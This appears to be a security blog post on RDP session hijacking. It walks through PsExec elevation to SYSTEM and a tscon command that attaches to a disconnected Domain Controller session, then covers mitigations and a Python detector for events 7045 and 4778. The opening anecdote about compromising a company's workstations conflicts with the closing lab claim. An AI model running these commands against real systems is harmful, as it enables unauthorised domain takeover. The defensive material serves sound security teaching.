I was poking around on a routine scan (purely for educational reasons) when one IT staffer's workstation practically invited me in.
A quick credential dump landed me local admin, and there they were: six RDP sessions quietly ticking away because he never hits Sign out.
This "pivot" user had connections to half the company's servers, so one tscon dropped me straight onto the Domain Controller.
All that risk, born from a single habit: closing the window instead of logging off.

Before we dive into the technical walkthrough, let's recap why a dangling RDP session is even a thing.
1. Background

Remote Desktop Protocol (RDP) spawns a user session on the target server. If you log off, that session is destroyed. If you merely close the RDP client, the session flips to Disconnected (`Disc`) and sits in RAM: programs keep running, credentials stay cached.

On Windows Server 2016 and earlier, `tscon.exe` allows a process running as NT AUTHORITY\SYSTEM to attach to any live session without knowing its password.
2. Lab Walk-through: Hijacking a Disconnected Session

2.1 Enumerate & understand your current role

2.2 Elevate to SYSTEM

```cmd
:: run an elevated cmd *as Administrator*
C:\tools\PsExec64.exe -s cmd.exe
```

`-s` launches the new `cmd.exe` as SYSTEM.
2.3 List RDP sessions

```cmd
C:\> query user
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>administrator         rdp-tcp#6           2  Active          .  04/01/2022 04:09
 DC                                        3  Disc            .  04/06/2022 06:51
```

- `administrator` (you) is Active on session 2.
- Session 3 is in `Disc` state: the perfect target.
2.4 Steal X's Session into the DC

```cmd
tscon 3 /dest:rdp-tcp#6
```

- `3` is the ID of X's session.
- `/dest:rdp-tcp#6` is your own transport channel (see the SESSIONNAME column of your Active session).

The RDP window instantly flips to the Domain Controller's desktop, programs and all, with no password prompt.

But on the bright side: they had a virtually uncrackable DC password.
3. Why This Is Dangerous

| Risk | Impact |
|---|---|
| Privilege escalation | Hijacker inherits the victim's rights, often Domain Admin. |
| Silent lateral movement | No new logon events; looks like the legit user is still logged in. |
| Data exposure | Open Outlook, KeePass, RDP files, all ready for the taking. |
| Operational disruption | Hijacker can run ransomware as the victim, masking attribution. |
4. Mitigations & Best Practices

- **Always log off**: teach admins to hit **Start → Sign out**.
- **Idle Session Limits**: GPO: Computer Config → Policies → Admin Templates → Windows Components → Remote Desktop Services → Session Time Limits. Set "End a disconnected session" to e.g. 15 minutes.
- **Deny tscon Hijack**: Server 2019+ prompts for the user's password when attaching to another session.
- **Restrict SYSTEM Escalation**: Block or alert on PsExec/WMI with Defender ASR rule 56. Deploy AppLocker / WDAC to deny unsigned admin tools.
- **Monitor Event 7045 & 4778**: Detect rogue service installs (`psexesvc`) and unexpected session re-connections.
- **MFA for Admin RDP**: Even if a token is hijacked, MFA blocks fresh privileged logons.
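As an added example (not part of the original post), here is a small Python pass over constructed Windows event records that implements the "Monitor Event 7045 & 4778" bullet: it flags a `PSEXESVC` service install (7045) and a 4778 session reconnect that arrives from a different client than the account's last RDP logon, or with no such logon at all. The field names follow the event XML data elements; the correlation rule, the account names and the sample records are my own assumptions, not captured logs.

```python
# Added example (not from the original post): correlate Windows event records
# to surface PsExec service installs (7045) and odd RDP reconnects (4778).
PSEXEC_MARKERS = ("psexesvc",)

# Constructed sample, merged from the System (7045) and Security (4624/4778)
# logs and sorted by time; field names follow the event XML data elements.
SAMPLE_EVENTS = [
    {"EventID": 4624, "LogonType": "10", "TargetUserName": "DC",
     "WorkstationName": "DC-ADMIN-PC", "IpAddress": "10.0.0.12"},
    # Owner reconnects to their own Disc session from the same client: benign.
    {"EventID": 4778, "AccountName": "DC", "SessionName": "rdp-tcp#3",
     "ClientName": "DC-ADMIN-PC", "ClientAddress": "10.0.0.12"},
    {"EventID": 7045, "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    # Same account reconnected, but from a different client and transport.
    {"EventID": 4778, "AccountName": "DC", "SessionName": "rdp-tcp#6",
     "ClientName": "HELPDESK-07", "ClientAddress": "10.0.0.55"},
    # Reconnect for an account with no remote-interactive logon on record.
    {"EventID": 4778, "AccountName": "svc_backup", "SessionName": "rdp-tcp#9",
     "ClientName": "HELPDESK-07", "ClientAddress": "10.0.0.55"},
]


def analyse(events):
    """Return (rule, detail) alerts for a chronologically ordered event list."""
    alerts = []
    # Assumption: a legitimate reconnect comes from the same client that made
    # the account's last LogonType 10 (RemoteInteractive) logon.
    last_client = {}  # account (lower-cased) -> (ClientName, ClientAddress)
    for ev in events:
        eid = ev["EventID"]
        if eid == 4624 and ev.get("LogonType") == "10":
            acct = ev["TargetUserName"].lower()
            last_client[acct] = (ev["WorkstationName"], ev["IpAddress"])
        elif eid == 7045:
            blob = (ev.get("ServiceName", "") + ev.get("ImagePath", "")).lower()
            if any(m in blob for m in PSEXEC_MARKERS):
                alerts.append(("psexec_service_install", ev["ServiceName"]))
        elif eid == 4778:
            acct = ev["AccountName"].lower()
            client = (ev["ClientName"], ev["ClientAddress"])
            if acct not in last_client:
                alerts.append(("reconnect_without_logon",
                               f"{acct} on {ev['SessionName']} from {client[0]}"))
            elif last_client[acct] != client:
                alerts.append(("reconnect_from_new_client",
                               f"{acct}: {last_client[acct][0]} -> {client[0]}"))
            last_client[acct] = client
    return alerts
```

Events 4778/4779 are only written when the "Audit Other Logon/Logoff Events" subcategory is enabled, so confirm that audit policy before relying on this rule.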
5. Server 2019 and Later

Server 2019/2022 changed `tscon` behaviour: SYSTEM can no longer attach to another user's session without supplying that user's credentials.

Still enforce log-off discipline: the session keeps consuming RAM/CPU and may be exposed by future privilege-escalation exploits.
6. Key Take-aways

- Disconnect ≠ Log off: your session remains a loaded gun on the server.
- Attackers with SYSTEM can pull the trigger in one line of PowerShell or `tscon`.
- Good hygiene (log off), sensible timeouts, and modern hardening (ASR, WDAC) shut this door.

Stay safe, and make "Sign out" your new muscle memory! 🛡️
References

- Microsoft Docs: `tscon` command
- Sysinternals PsExec
- [Mitre ATT&CK, T1563.002: Remote Services > RDP Hijacking](https://attack.mitre.org/techniques/T1563/002)

*And as always, all of this was done safely in a lab environment.*